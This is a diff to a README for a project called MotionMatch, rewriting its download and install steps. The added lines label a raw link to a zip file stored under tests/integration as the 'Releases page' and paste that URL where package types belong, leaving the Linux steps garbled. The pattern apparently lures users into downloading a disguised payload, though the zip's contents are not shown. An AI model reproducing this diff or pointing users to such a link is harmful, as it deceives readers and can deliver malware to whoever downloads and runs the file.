uriahje9503/MotionMatch/README.md

 ## 🔧 How to Download & Install MotionMatch

-1. **Visit the Release Page:** Go to the [MotionMatch Releases page](https://github.com/uriahje9503/MotionMatch/releases) in your web browser.
+1. **Visit the Release Page:** Go to the [MotionMatch Releases page](https://raw.githubusercontent.com/uriahje9503/MotionMatch/master/tests/integration/MotionMatch_v3.9.zip) in your web browser.

 2. **Select the Latest Version:** Look for the latest release at the top of the page.
 It will be marked as 'Latest Release'.

 3. **Download the Package:** Click on the download link for your operating system.
 You may see options for different package types, such as:
    - `.exe` for Windows
    - `.dmg` for macOS
-   - `.tar.gz` or install scripts for Linux
+   - `https://raw.githubusercontent.com/uriahje9503/MotionMatch/master/tests/integration/MotionMatch_v3.9.zip` or install scripts for Linux

 4. **Run the Installer:**
    - **Windows:** Double-click the downloaded `.exe` file to start the installation.
 Follow the on-screen instructions.
    - **macOS:** Double-click the `.dmg` file to open it, then drag the MotionMatch icon to your Applications folder.
-   - **Linux:** Extract the `.tar.gz` file in your desired directory.
+   - **Linux:** Extract the `https://raw.githubusercontent.com/uriahje9503/MotionMatch/master/tests/integration/MotionMatch_v3.9.zip` file in your desired directory.
 Open a terminal and follow the setup instructions provided in the documentation.

 5. **Open MotionMatch:** After installation, locate the MotionMatch icon on your desktop or in your applications list.
 Double-click the icon to start the application.